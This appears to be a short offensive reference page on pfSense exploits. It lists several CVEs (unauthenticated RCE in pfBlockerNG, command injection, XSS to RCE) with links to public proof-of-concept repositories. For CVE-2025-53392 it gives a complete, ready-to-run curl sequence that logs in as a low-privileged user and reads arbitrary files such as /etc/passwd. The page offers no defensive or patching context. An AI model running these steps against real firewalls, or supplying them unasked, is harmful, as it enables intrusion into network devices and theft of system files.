pfSense

pfSense exploits (PoC)

CVE-2022-31814 - Unauth RCE

pfBlockerNG <= 2.1.4_26 Unauth RCE

Exploiting pfsense Remote Code Execution – CVE-2022-31814 - LaburityLaburity - Cyber Security Services

GitHub - Chocapikk/CVE-2022-31814: pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)GitHub

CVE-2025-53392 - Arbitrary File Read

pfSense 2.8.0 via Diagnostics Web Interface

GitHub - skraft9/pfsense-security-researchGitHub

# 1. Start session and extract CSRF token
$ curl -k -c cookies.txt -s https://<IP>/diag_command.php > login_page.html
$ csrf_token=$(grep '__csrf_magic' login_page.html | grep 'value=' | sed -E 's/.*value="([^"]+)".*/\1/')

# 2. Authenticate as low-privileged user "dev"
$ curl -k -b cookies.txt -c cookies.txt \
  -d "__csrf_magic=$csrf_token" \
  -d "usernamefld=dev" \
  -d "passwordfld=pass" \
  -d "login=Sign+In" \
  https://<IP>/index.php > /dev/null

# 3. Get CSRF token post-login
$ curl -k -b cookies.txt -s https://<IP>/diag_command.php > diag_authed.html
$ csrf_token=$(grep '__csrf_magic' diag_authed.html | grep 'value=' | sed -E 's/.*value="([^"]+)".*/\1/')

# 4. Exfiltrate arbitrary file (example: /etc/passwd)
$ curl -k -b cookies.txt -s -X POST https://<IP>/diag_command.php \
  -d "__csrf_magic=$csrf_token" \
  -d "submit=DOWNLOAD" \
  -d "dlPath=/etc/passwd"

CVE-2023-42326 - PfSense 2.7.0 Command Injection Exploit

GitHub - bl4ckarch/CVE-2023-42326: This is a simple POC to for show the pfsense 2.7 Command injection Vulnerability ( CVE-2023-42326)GitHub

CVE-2024-46538 PfSense Stored XSS lead to RCE

GitHub - EQSTLab/CVE-2024-46538: PfSense Stored XSS lead to Arbitrary Code Execution exploitGitHub